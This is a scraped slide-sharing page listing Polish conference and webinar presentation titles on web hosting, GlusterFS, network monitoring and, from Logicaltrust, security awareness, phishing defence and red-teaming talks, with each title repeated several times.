Serwer internetowy w systemie Linux
Serwer internetowy w systemie LinuxSerwer internetowy w systemie Linux
Serwer internetowy w systemie Linux
 
Bezpieczenstwo Portali Spolecznosciowych W Ujeciu Robakow Web 20 Pingwinaria2009
Bezpieczenstwo Portali Spolecznosciowych W Ujeciu Robakow Web 20 Pingwinaria2009Bezpieczenstwo Portali Spolecznosciowych W Ujeciu Robakow Web 20 Pingwinaria2009
Bezpieczenstwo Portali Spolecznosciowych W Ujeciu Robakow Web 20 Pingwinaria2009
 
PLNOG16: Nowe założenia dla zbieranie logów, statystyk i alertów, Maciej Kałk...
PLNOG16: Nowe założenia dla zbieranie logów, statystyk i alertów, Maciej Kałk...PLNOG16: Nowe założenia dla zbieranie logów, statystyk i alertów, Maciej Kałk...
PLNOG16: Nowe założenia dla zbieranie logów, statystyk i alertów, Maciej Kałk...
 
Monitoring sieci
Monitoring sieciMonitoring sieci
Monitoring sieci
 
W3 Total Cache - skuteczne przyśpieszanie WordPressa
W3 Total Cache - skuteczne przyśpieszanie WordPressaW3 Total Cache - skuteczne przyśpieszanie WordPressa
W3 Total Cache - skuteczne przyśpieszanie WordPressa
 
[WHUG] Wielki brat patrzy - czyli jak zbieramy dane o użytkownikach allegro
[WHUG] Wielki brat patrzy - czyli jak zbieramy dane o użytkownikach allegro[WHUG] Wielki brat patrzy - czyli jak zbieramy dane o użytkownikach allegro
[WHUG] Wielki brat patrzy - czyli jak zbieramy dane o użytkownikach allegro
 
Gluster FS
Gluster FSGluster FS
Gluster FS
 
GlusterFS
GlusterFSGlusterFS
GlusterFS
 
PLNOG 6: Łukasz Jagiełło - Wdrożenie skalowalnego systemu plików GlusterFS w ...
PLNOG 6: Łukasz Jagiełło - Wdrożenie skalowalnego systemu plików GlusterFS w ...PLNOG 6: Łukasz Jagiełło - Wdrożenie skalowalnego systemu plików GlusterFS w ...
PLNOG 6: Łukasz Jagiełło - Wdrożenie skalowalnego systemu plików GlusterFS w ...
 
PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...
PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...
PLNOG22 - Piotr Stolarek - Bezpieczeństwo użytkowania platform usługowych Tel...
 
PLNOG 22 - Krzysztof Załęski - Praktyczne zastosowanie narzędzi NetDevOps
PLNOG 22 - Krzysztof Załęski - Praktyczne zastosowanie narzędzi NetDevOpsPLNOG 22 - Krzysztof Załęski - Praktyczne zastosowanie narzędzi NetDevOps
PLNOG 22 - Krzysztof Załęski - Praktyczne zastosowanie narzędzi NetDevOps
 
“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...
“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...
“Dziesięć serwerów poproszę!“, czyli co może Ci zaoferować definiowanie infra...
 
Jaki hosting pod wordpressa
Jaki hosting pod wordpressaJaki hosting pod wordpressa
Jaki hosting pod wordpressa
 
It od kuchni w nokaut.pl
It od kuchni w nokaut.plIt od kuchni w nokaut.pl
It od kuchni w nokaut.pl
 
IT od kuchni w Nokaut.pl
IT od kuchni w Nokaut.pl IT od kuchni w Nokaut.pl
IT od kuchni w Nokaut.pl
 
HTTP od zera do bohatera
HTTP od zera do bohateraHTTP od zera do bohatera
HTTP od zera do bohatera
 
Android i REST
Android i RESTAndroid i REST
Android i REST
 
tRPC - czy to koniec GraphQL?
tRPC - czy to koniec GraphQL?tRPC - czy to koniec GraphQL?
tRPC - czy to koniec GraphQL?
 
SphinxSearch
SphinxSearchSphinxSearch
SphinxSearch
 

More from Logicaltrust pl

More from Logicaltrust pl (11)

Jak cyberprzęstepcy okradają dziś firmy - webinar 2020.06.24
Jak cyberprzęstepcy okradają dziś firmy - webinar 2020.06.24Jak cyberprzęstepcy okradają dziś firmy - webinar 2020.06.24
Jak cyberprzęstepcy okradają dziś firmy - webinar 2020.06.24
 
Security Awareness po polsku - webinar 2019.11.29
Security Awareness po polsku - webinar 2019.11.29Security Awareness po polsku - webinar 2019.11.29
Security Awareness po polsku - webinar 2019.11.29
 
8 zasad skutecznego security awareness
8 zasad skutecznego security awareness8 zasad skutecznego security awareness
8 zasad skutecznego security awareness
 
Ataki socjotechniczne w praktyce - SecurityBSides Warsaw 2019
Ataki socjotechniczne w praktyce - SecurityBSides Warsaw 2019Ataki socjotechniczne w praktyce - SecurityBSides Warsaw 2019
Ataki socjotechniczne w praktyce - SecurityBSides Warsaw 2019
 
Ataki socjotechniczne w praktyce - Confidence 2019
Ataki socjotechniczne w praktyce - Confidence 2019Ataki socjotechniczne w praktyce - Confidence 2019
Ataki socjotechniczne w praktyce - Confidence 2019
 
Minerva_lib - fuzzing tool
Minerva_lib - fuzzing toolMinerva_lib - fuzzing tool
Minerva_lib - fuzzing tool
 
"Spear phishing - jak się bronić? Case studies." - SecurityBSides 2018
"Spear phishing - jak się bronić? Case studies." - SecurityBSides 2018"Spear phishing - jak się bronić? Case studies." - SecurityBSides 2018
"Spear phishing - jak się bronić? Case studies." - SecurityBSides 2018
 
Spear phishing - jak się bronić? Case studies - Confidence 2018
Spear phishing - jak się bronić? Case studies - Confidence 2018Spear phishing - jak się bronić? Case studies - Confidence 2018
Spear phishing - jak się bronić? Case studies - Confidence 2018
 
Redteaming in Poland - test cases (Security)
Redteaming in Poland - test cases (Security)Redteaming in Poland - test cases (Security)
Redteaming in Poland - test cases (Security)
 
Redteaming w Polsce - przykłady
Redteaming w Polsce - przykładyRedteaming w Polsce - przykłady
Redteaming w Polsce - przykłady
 
APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...
APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...
APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wybrane studium prz...
 

Krytyczne błędy konfiguracji